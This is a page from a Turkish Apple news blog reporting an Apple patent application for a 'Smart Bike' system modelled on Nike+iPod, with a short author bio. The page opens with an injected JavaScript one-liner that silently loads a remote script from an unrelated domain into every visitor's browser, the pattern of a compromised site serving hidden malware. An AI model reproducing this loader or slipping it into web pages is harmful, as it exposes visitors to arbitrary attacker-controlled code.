;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bisiklet+iPod - elmasuyu.net
Kategoriler
Apple Donanım Haber

Bisiklet+iPod

iPod+Nike logoApple her geçen gün yeni bir patente imza atıyor. Uzun zaman önce Nike ile ortak yürüttüğü çalışmaya yenisini eklemeye karar vermiş gibi gözüken Apple, şimdi de aynı teknolojiyi bisikletlere adapte etmeye çalışıyor. Patent başvurusunda Smart Bike yani Akıllı Bisiklet olarak görünen bu yeni alt yapı ile kullanıcıları Nike+iPod entegrasyonundaki gibi birçok sağlık ve ölçüm bilgilerine ulaşabilecek. Bu alt yapının göze çarpan en önemli özelliği sadece tek bir kişinin bilgilerini değil birçok kişinin bilgilerini kaydedebilmesidir. Aşağıdaki çizim patenti anlatan çizimlerden biri. Bakalım gelecekte Apple bizim karşımıza nasıl bir ürün ile çıkacak?

6a0120a5580826970c01348600df44970c-800wi

Yazar Cem YENER

ElmaSuyu.Net Yöneticisi - Site faaliyetlerinin yanında bilgisayar dünyası ile yakından ilgili. Mac ve iOS özellikle ilgilendi konulardır.
Üniversite Program Koordinatörü - Bir devlet üniversitesinin İngilizce Hazırlık Programı Koordinatörü ve Akademik Direktörlüğünü yürütmekte.
@jamwinner